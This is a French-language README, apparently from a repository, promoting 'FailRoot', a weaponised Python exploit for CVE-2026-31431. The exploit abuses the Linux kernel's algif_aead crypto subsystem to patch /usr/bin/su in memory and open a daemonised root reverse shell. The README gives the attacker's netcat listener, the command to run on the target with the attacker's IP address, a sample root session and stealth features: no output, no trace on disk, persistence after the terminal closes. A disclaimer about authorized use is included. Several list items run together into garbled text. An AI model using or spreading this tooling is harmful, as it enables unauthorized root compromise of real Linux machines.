
Exploit Python armé pour CVE-2026-31431, enchaînant une élévation de privilèges du noyau Linux vers un reverse shell root démonisé avec PTY complet, en patchant /usr/bin/su en mémoire.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot est un exploit armé pour CVE-2026-31431 — une écriture hors limites dans le sous-système crypto: algif_aead du noyau Linux.
Il enchaîne une élévation de privilèges avec un reverse shell root daemonisé avec PTY complet :
AF_ALG + splice() → écriture de 4 octets dans le cache de pages → patch de /usr/bin/su → root
L'exploit entier tient dans un seul fichier. Aucune compilation. Aucune dépendance externe. Aucune trace sur le disque — le binaire su est patché uniquement en mémoire.
algif_aead + authencesn via plusieurs stratégies de repli/usr/bin/supty.spawn("/usr/bin/su") → TTY root entièrement interactifLe reverse shell survit à la fermeture du terminal (SIGHUP ignoré), n'affiche aucune sortie sur la cible, et se reconnecte avec des tentatives pendant jusqu'à 3 minutes.
# Attaquant — démarrer l'écouteur :
nc -lvnp 4444
# Cible — exécuter l'exploit (rien ne s'affichera, il se daemonise instantanément) :
python3 exploit.py <IP_ATTAQUANT> 4444
attaquant ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victime:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su (lisible par tous sur toutes les distributions)algif_aead et authencesn disponiblessudo requisPour la recherche en sécurité et l'éducation autorisées uniquement. Toute utilisation abusive est illégale.
| De | À (exclusif) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |